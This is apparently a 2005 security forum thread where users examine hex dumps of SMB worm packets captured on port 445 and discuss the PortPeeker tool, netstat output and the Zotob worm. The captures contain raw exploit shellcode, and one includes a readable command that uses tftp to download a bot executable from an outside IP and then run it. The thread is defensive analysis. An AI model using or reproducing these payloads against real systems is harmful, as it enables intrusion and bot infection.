217.44.101.66 : 24463 TCP Data In Length 1402 bytes MD5 = 2066FD703988D22313E7F2E9DAFDDB49 ---- 13/08/2005 09:42:30.576 0 00 00 0F D8 FF 53 4D 42 25 00 00 00 00 18 07 C8 .....SMB%....... 10 00 00 00 00 00 00 00 00 00 00 00 00 00 08 18 01 ................ 20 00 08 70 00 10 00 00 84 0F 00 00 00 04 00 00 00 ..p............. 30 00 00 00 00 00 00 00 00 00 54 00 84 0F 54 00 02 .........T...T.. 40 00 26 00 00 40 95 0F 00 5C 00 50 00 49 00 50 00 .&..@...\.P.I.P. 50 45 00 5C 00 00 00 00 00 05 00 00 02 10 00 00 00 E.\............. 60 84 0F 00 00 01 00 00 00 6C 0F 00 00 00 00 09 00 ........l....... 70 E2 00 ED 00 EB 00 0A 00 E8 00 DA 00 FF 00 FF 00 ................ 80 FF 00 2E 00 62 00 65 00 67 00 2E 00 71 00 93 00 ....b.e.g...q... 90 99 00 C9 00 99 00 C9 00 99 00 C9 00 12 00 FD 00 ................ A0 BD 00 91 00 FD 00 16 00 99 00 C9 00 C1 00 72 00 ..............r. B0 68 00 AA 00 42 00 FD 00 66 00 AA 00 FD 00 10 00 h...B...f....... C0 BA 00 14 00 1C 00 A9 00 98 00 99 00 C9 00 99 00 ................ D0 C9 00 C9 00 F3 00 98 00 F1 00 98 00 99 00 C9 00 ................ E0 86 00 99 00 C9 00 71 00 C0 00 98 00 99 00 C9 00 ......q......... F0 99 00 C9 00 90 00 5F 00 CB 00 37 00 92 00 59 00 ......_...7...Y. 100 96 00 1C 00 78 00 99 00 C9 00 99 00 C9 00 99 00 ....x........... 110 C9 00 14 00 E4 00 57 00 71 00 7D 00 99 00 C9 00 ......W.q.}..... 120 99 00 C9 00 99 00 C9 00 14 00 E4 00 3A 00 71 00 ............:.q. 130 45 00 99 00 C9 00 99 00 C9 00 99 00 C9 00 F3 00 E............... 140 9D 00 F1 00 99 00 C9 00 89 00 99 00 C9 00 99 00 ................ 150 C9 00 F1 00 99 00 C9 00 99 00 C9 00 9C 00 99 00 ................ 160 C9 00 F3 00 99 00 C9 00 71 00 B3 00 98 00 99 00 ........q....... 170 C9 00 99 00 C9 00 67 00 F3 00 E3 00 F0 00 10 00 ......g......... 180 1C 00 DC 00 98 00 99 00 C9 00 99 00 C9 00 B2 00 ................ 190 59 00 C9 00 C9 00 F3 00 9B 00 C9 00 C9 00 F1 00 Y............... 1A0 99 00 C9 00 99 00 C9 00 99 00 C9 00 D9 00 14 00 ................ 1B0 04 00 A1 00 98 00 99 00 C9 00 99 00 C9 00 CA 00 ................ 1C0 71 00 9E 00 98 00 99 00 C9 00 99 00 C9 00 8D 00 q............... 1D0 68 00 61 00 91 00 10 00 1C 00 AD 00 98 00 99 00 h.a............. 1E0 C9 00 99 00 C9 00 1A 00 61 00 66 00 96 00 1D 00 ........a.f..... 1F0 11 00 99 00 C9 00 99 00 C9 00 99 00 C9 00 B2 00 ................ 200 50 00 C8 00 C8 00 C8 00 F3 00 98 00 14 00 DC 00 P............... 210 57 00 C9 00 71 00 25 00 99 00 C9 00 99 00 C9 00 W...q.%......... 220 99 00 C9 00 4E 00 A4 00 C0 00 91 00 12 00 49 00 ....N.........I. 230 92 00 59 00 ED 00 F7 00 B2 00 59 00 C9 00 C9 00 ..Y.......Y..... 240 C9 00 C9 00 14 00 C4 00 3A 00 CA 00 CB 00 71 00 ........:.....q. 250 3B 00 99 00 C9 00 99 00 C9 00 99 00 C9 00 FF 00 ;............... 260 24 00 E4 00 21 00 92 00 59 00 ED 00 CF 00 CD 00 $...!...Y....... 270 CD 00 F1 00 99 00 C9 00 99 00 C9 00 9C 00 99 00 ................ 280 C9 00 66 00 2C 00 DC 00 98 00 99 00 C9 00 99 00 ..f.,........... 290 C9 00 C9 00 71 00 1E 00 99 00 C9 00 99 00 C9 00 ....q........... 2A0 99 00 C9 00 FB 00 B0 00 B8 00 83 00 C3 00 CD 00 ................ 2B0 12 00 5D 00 F3 00 99 00 C9 00 C9 00 CB 00 66 00 ..]...........f. 2C0 2C 00 DC 00 98 00 99 00 C9 00 99 00 C9 00 66 00 ,.............f. 2D0 2C 00 AD 00 98 00 99 00 C9 00 99 00 C9 00 71 00 ,.............q. 2E0 0B 00 99 00 C9 00 99 00 C9 00 99 00 C9 00 5A 00 ..............Z. 2F0 48 00 A6 00 96 00 C0 00 66 00 2C 00 AD 00 98 00 H.......f.,..... 300 99 00 C9 00 99 00 C9 00 71 00 1B 00 99 00 C9 00 ........q....... 310 99 00 C9 00 99 00 C9 00 4C 00 29 00 A7 00 EB 00 ........L.)..... 320 F3 00 9C 00 14 00 04 00 A1 00 98 00 99 00 C9 00 ................ 330 99 00 C9 00 CA 00 71 00 E9 00 99 00 C9 00 99 00 ......q......... 340 C9 00 99 00 C9 00 34 00 F4 00 26 00 71 00 F3 00 ......4...&.q... 350 99 00 C9 00 71 00 FC 00 99 00 C9 00 99 00 C9 00 ....q........... 360 99 00 C9 00 F9 00 3B 00 13 00 EF 00 29 00 46 00 ......;.....).F. 370 6B 00 37 00 5F 00 DE 00 66 00 99 00 C9 00 5A 00 k.7._...f.....Z. 380 EC 00 A8 00 A0 00 99 00 C9 00 99 00 C9 00 99 00 ................ 390 C9 00 99 00 C9 00 99 00 C9 00 B7 00 C5 00 FF 00 ................ 3A0 ED 00 E9 00 EC 00 E9 00 FD 00 B7 00 FC 00 E1 00 ................ 3B0 FC 00 99 00 C9 00 99 00 C9 00 99 00 C9 00 99 00 ................ 3C0 C9 00 99 00 C9 00 99 00 C9 00 99 00 C9 00 99 00 ................ 3D0 C9 00 99 00 C9 00 99 00 C9 00 99 00 C9 00 99 00 ................ 3E0 C9 00 99 00 C9 00 CA 00 F5 00 FC 00 FC 00 E9 00 ................ 3F0 99 00 C9 00 F2 00 FC 00 EB 00 F7 00 FC 00 F5 00 ................ 400 AA 00 AB 00 99 00 C9 00 C7 00 34 00 F9 00 AA 00 ..........4..... 410 59 00 B4 00 25 00 2A 00 2A 00 66 00 C9 00 AC 00 Y...%.*.*.f..... 420 93 00 90 00 81 00 B7 00 C9 00 9C 00 90 00 9D 00 ................ 430 63 00 83 00 C9 00 CD 00 71 00 92 00 99 00 C9 00 c.......q....... 440 99 00 C9 00 99 00 C9 00 BF 00 19 00 35 00 51 00 ............5.Q. 450 14 00 FD 00 BD 00 95 00 0A 00 72 00 91 00 C7 00 ..........r..... 460 34 00 F9 00 71 00 C8 00 99 00 C9 00 99 00 C9 00 4...q........... 470 99 00 C9 00 12 00 D2 00 A5 00 12 00 D5 00 80 00 ................ 480 E1 00 9A 00 52 00 AA 00 6F 00 14 00 8D 00 2A 00 ....R...o.....*. 490 9A 00 C8 00 B9 00 12 00 8B 00 9A 00 4A 00 AA 00 ............J... 4A0 59 00 58 00 59 00 9E 00 AB 00 9B 00 DB 00 19 00 Y.X.Y........... 4B0 A3 00 99 00 C9 00 EC 00 6C 00 A2 00 DD 00 BD 00 ........l....... 4C0 85 00 ED 00 9E 00 DF 00 A2 00 E8 00 81 00 EB 00 ................ 4D0 44 00 55 00 12 00 C8 00 BD 00 9A 00 4A 00 96 00 D.U.........J... 4E0 2E 00 8D 00 EB 00 12 00 D8 00 85 00 9A 00 5A 00 ..............Z. 4F0 12 00 9D 00 09 00 9A 00 5A 00 10 00 DD 00 BD 00 ........Z....... 500 85 00 F8 00 10 00 1C 00 D0 00 98 00 99 00 C9 00 ................ 510 99 00 C9 00 66 00 49 00 66 00 7F 00 FD 00 FE 00 ....f.I.f...... 520 12 00 87 00 A9 00 99 00 C9 00 12 00 C2 00 95 00 ................ 530 12 00 C2 00 85 00 12 00 82 00 12 00 C2 00 91 00 ................ 540 5A 00 B7 00 FC 00 F7 00 FD 00 B7 00 90 00 90 00 Z............... 550 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 560 90 00 90 00 90 00 90 00 90 00 90 00 90 00 90 00 ................ 570 90 00 90 00 90 00 90 00 90 00 ..........
217.44.101.66 : 24463 TCP Data In Length 1256 bytes MD5 = E0EDB1A4459647159AB7DD0F9BC73F78 ---- 13/08/2005 09:42:30.696 0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 10 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 20 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 30 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 40 00 00 00 00 9A A8 40 00 01 00 00 00 00 00 00 00 ......@......... 50 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 ................ 60 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 ................ 70 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 ................ 80 01 00 00 00 00 00 00 00 9A A8 40 00 01 00 00 00 ..........@..... 90 00 00 00 00 01 00 00 00 00 00 00 00 9A A8 40 00 ..............@. A0 01 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 ................ B0 9A A8 40 00 01 00 00 00 00 00 00 00 01 00 00 00 ..@............. C0 00 00 00 00 31 31 31 31 31 31 31 31 31 31 31 31 ....111111111111 D0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 E0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 F0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 100 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 110 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 120 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 130 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 140 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 150 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 160 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 170 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 180 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 190 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 1A0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 1B0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 1C0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 1D0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 1E0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 1F0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 200 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 210 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 220 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 230 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 240 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 250 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 260 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 270 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 280 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 290 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 2A0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 2B0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 2C0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 2D0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 2E0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 2F0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 300 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 310 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 320 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 330 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 340 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 350 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 360 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 370 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 380 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 390 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 3A0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 3B0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 3C0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 3D0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 3E0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 3F0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 400 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 410 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 420 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 430 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 440 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 450 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 460 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 470 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 480 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 490 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 4A0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 4B0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 4C0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 4D0 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 31 1111111111111111 4E0 31 31 31 31 31 31 31 31 11111111 Blake |
|
|
to jvmorris
said by jvmorris:Probably a capture that Blake made using PortPeeker. You can find it via the website at www.linklogger.com , if that's what it is. Thank you JVMorris.... I tend to be a curious one and have actually gotten compulsive with learning all I can about Security.... I've downloaded that program and will check it out this weekend.... Rgds, Sherri |
|
jvmorrisI Am The Man Who Was Not There. MVM join:2001-04-03 Reston, VA |
Anytime, somewhere or other, Blake posted something on how you can use those MD5 hashes to determine if you're seeing the 'same old, same old' or something new. Unfortunately, I've forgotten where that was.
Now, that's just the MD5 hash of the captured packet; it's not a disassembly of the captured code. (I think Steve can tell you more about that, if you're interested in playing with assembler.) |
|
1 edit |
A Sasser type approach (note the tftp transfer): 81.240.111.123 : 4565 TCP Data In Length 1452 bytes MD5 = 8442B1FBB561B60CC9E9E254B7C25B6F ---- 13/08/2005 14:12:28.837 0 00 00 10 BF FF 53 4D 42 73 00 00 00 00 18 07 C8 .....SMBs....... 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 37 13 ..............7. 20 00 00 00 00 0C FF 00 00 00 04 11 0A 00 00 00 00 ................ 30 00 00 00 7E 10 00 00 00 00 D4 00 00 80 7E 10 60 ...~.........~.` 40 82 10 7A 06 06 2B 06 01 05 05 02 A0 82 10 6E 30 ..z..+........n0 50 82 10 6A A1 82 10 66 23 82 10 62 03 82 04 01 00 ..j...f#..b..... 60 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 70 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 80 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 90 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA B0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA C0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA D0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA E0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA F0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 100 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 110 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 120 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 130 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 140 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 150 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 160 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 170 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 180 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 190 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 1A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 1B0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 1C0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 1D0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 1E0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 1F0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 200 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 210 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 220 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 230 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 240 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 250 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 260 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 270 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 280 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 290 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 2A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 2B0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 2C0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 2D0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 2E0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 2F0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 300 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 310 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 320 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 330 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 340 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 350 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 360 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 370 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 380 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 390 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 3A0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 3B0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 3C0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 3D0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 3E0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 3F0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 400 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 410 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 420 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 430 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 440 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 450 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA 460 03 00 23 82 0C 57 03 82 04 0A 00 90 42 90 42 90 ..#..W......B.B. 470 42 90 42 81 C4 54 F2 FF FF FC E8 46 00 00 00 8B B.B..T.....F.... 480 45 3C 8B 7C 05 78 01 EF 8B 4F 18 8B 5F 20 01 EB E<.|.x...O.._ .. 490 E3 2E 49 8B 34 8B 01 EE 31 C0 99 AC 84 C0 74 07 ..I.4...1.....t. 4A0 C1 CA 0D 01 C2 EB F4 3B 54 24 04 75 E3 8B 5F 24 .......;T$.u.._$ 4B0 01 EB 66 8B 0C 4B 8B 5F 1C 01 EB 8B 1C 8B 01 EB ..f..K._........ 4C0 89 5C 24 04 C3 31 C0 64 8B 40 30 85 C0 78 0F 8B .\$..1.d.@0..x.. 4D0 40 0C 8B 70 1C AD 8B 68 08 E9 0B 00 00 00 8B 40 @..p...h.......@ 4E0 34 05 7C 00 00 00 8B 68 3C 5F 31 F6 60 56 EB 0D 4.|....h<_1.`V.. 4F0 68 EF CE E0 60 68 98 FE 8A 0E 57 FF E7 E8 EE FF h...`h....W..... 500 FF FF 63 6D 64 20 2F 63 20 74 66 74 70 20 2D 69 ..cmd /c tftp -i 510 20 38 31 2E 32 34 30 2E 31 31 31 2E 31 32 33 20 81.240.111.123 520 47 45 54 20 4D 53 4C 53 41 33 32 2E 65 78 65 26 GET MSLSA32.exe& 530 73 74 61 72 74 20 4D 53 4C 53 41 33 32 2E 65 78 start MSLSA32.ex 540 65 26 65 78 69 74 00 42 42 42 42 42 42 42 42 42 e&exit.BBBBBBBBB 550 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 560 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 570 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 580 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 590 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB 5A0 42 42 42 42 42 42 42 42 42 42 42 42 BBBBBBBBBBBB Edit -> this is the Backdoor.Win32.Rbot.gen worm Blake |
|
|
to Link Logger
I don't mean to steal the thread but I thought I would look at this myself, went to fire up port peeker and I got this access denied after configurering the scanner. |
|
catseyenuAck Pfft Premium Member join:2001-11-17 Fix East
1 recommendation |
|
|
1 edit |
He is right you need to be an admin level user to get access to the raw ports or something is already listening on that port as only one application can listen on a port at a time. Blake |
|
norwegian Premium Member join:2005-02-15 Outback |
to Link Logger
gday all to link logger, i tried port peeker last night and had 445 give me the same error, even though, i tried 443, and no dramas in that program, cant remember, but port 1700 showed a raw port(socket),besides those 2 x 445 i have, yet port explorer never showed anything i will see if i can get something off that port, it used to be 1900, till i met the good people here norwegian |
|
|
Windows by default typically takes TCP ports 135, 137, 139, 445, etc, so before listening on a port with PortPeeker you might want to check to see if that port is open by doing something like netstat -a
I have some special Windows installs that I use to listen on ports 445, 135 and other typical Windows ports. Try PortPeeker on TCP port 80 and you will see some Nimda attacks or UDP port 1434 and you will likely see some SQL Slammer attacks.
Blake |
|
|
Well I am the admin. but windows is listening at 0.0.0.0.0 not sure why tho. Also I have tracked traffic on port 445 before on this same computer. Ahh well it works on all the other ports LOL. |
|
Marilla9I Am My Own Arbiter Premium Member join:2002-12-06 Belpre, OH |
Marilla9
Premium Member
2005-Aug-13 11:16 pm
When netstat says your system is listening on 0.0.0.0, that means it's listening on all available IP addresses which likely, in your case, is the only one you have.
Also incidentally, anything that says it's listening on 127.0.0.1 means it will only respond to itself.
Some things will show as your 'real' IP. Since you likely only have one, that's effectively the same as 0.0.0.0. A system can have multiple IPs, though... and any netstat entries which show 0.0.0.0 means it's listening on any/all IPs on that interface. |
|
1 edit |
I think 0.0.0.0 means all interfaces, including any loopbacks (e.g. 127.0.0.1). I think that's what you were saying as well, but it wasn't clear (to me) that you also meant the loopback(s). EDIT: dannyboy, you will most likely not be able to use PortPeeker on port 445 if you're using a Windows (2k/XP) machine. As Link Logger already said, the system binds to these ports way before you get a chance to login and grab them. You can disable NetBIOS to free up things like 139, but things like 135 and 445 are more of a challenge if you want to maintain a working machine that can map drives/printers/etc. Link Logger mentioned he is using 'special' machines for these captures, meaning he has all of this stuff (NetBIOS, CIFS, RPC, etc) turned off. Unless you have a hardened system I would not be allowing 445 traffic through to your PC anyway. Just my $0.02. |
|
Name Game Premium Member join:2002-07-07 Grand Rapids, MI 1 edit |
to Link Logger
Looks like Zotob » MS05-039 PnP worm in the wildSo nice of someone to publish the exploit code.. » www.frsirt.com/exploits/ ··· pl.c.php |
|
Daniel MVM join:2000-06-26 San Francisco, CA
1 recommendation |
Daniel
MVM
2005-Aug-14 3:23 pm
said by Name Game:So nice of someone to publish the exploit code... And for you to post a link to it. |
|
ZZZZZZZ Premium Member join:2001-05-27 PARADISE |
to Link Logger
And so what happens if you close those ports with something like this?' » www.firewallleaktester.c ··· wwdc.htm |
|
Name Game Premium Member join:2002-07-07 Grand Rapids, MI |
to Daniel
said by Daniel:said by Name Game:So nice of someone to publish the exploit code... And for you to post a link to it. Oh is that what that was..:D |
|
redxii Mod join:2001-02-26 Michigan |
redxii
Mod
2005-Aug-14 6:26 pm
Apparently that code isn't sufficient to exploit it. I compiled and ran it against Windows 2000 on my lan without the patch and nothing happened.. except receiving the packet |
|
|
Sorry really busy weekend with family stuff. As one worm was designed to work I went to handydjs.com and was able to download the bot.exe file which is Backdoor.Win32.Wootbot.bw
I don't think any of these are the new worm, but given this new worm attacks 445 I don't think its really possible to score big as a worm/virus writer on TCP Port 445/139/135 as every vulnerable 445/139/135 system has already been owned at least x times, so in short its the same old victim, just with a new master for now.
Has anyone seen a significant jump in their 445 traffic?
Blake |
|
Link Logger |
And another: 68.144.64.230 : 3421 TCP Data In Length 1460 bytes MD5 = C352C88FB9D3BFA1057DF0FBDE4E5BD1 ---- 15/08/2005 01:51:54.168 0 00 00 08 90 FF 53 4D 42 25 00 00 00 00 18 07 C8 .....SMB%....... 10 00 00 00 00 00 00 00 00 00 00 00 00 00 08 78 04 ..............x. 20 00 08 60 00 10 00 00 3C 08 00 00 00 01 00 00 00 ..`....<........ 30 00 00 00 00 00 00 00 00 00 54 00 3C 08 54 00 02 .........T.<.T.. 40 00 26 00 00 40 4D 08 00 5C 00 50 00 49 00 50 00 .&..@M..\.P.I.P. 50 45 00 5C 00 00 00 40 00 05 00 00 03 10 00 00 00 E.\...@......... 60 3C 08 00 00 01 00 00 00 24 08 00 00 00 00 36 00 <.......$.....6. 70 11 00 00 00 00 00 00 00 11 00 00 00 52 00 4F 00 ............R.O. 80 4F 00 54 00 5C 00 53 00 59 00 53 00 54 00 45 00 O.T.\.S.Y.S.T.E. 90 4D 00 5C 00 30 00 30 00 30 00 30 00 00 00 00 00 M.\.0.0.0.0..... A0 FF FF 00 00 E0 07 00 00 00 00 00 00 00 00 00 00 ................ B0 C0 07 00 00 00 00 00 00 90 90 90 90 90 90 90 90 ................ C0 EB 08 90 90 67 15 7A 76 EB 08 90 90 67 15 7A 76 ....g.zv....g.zv D0 EB 08 90 90 67 15 7A 76 EB 08 90 90 67 15 7A 76 ....g.zv....g.zv E0 EB 08 90 90 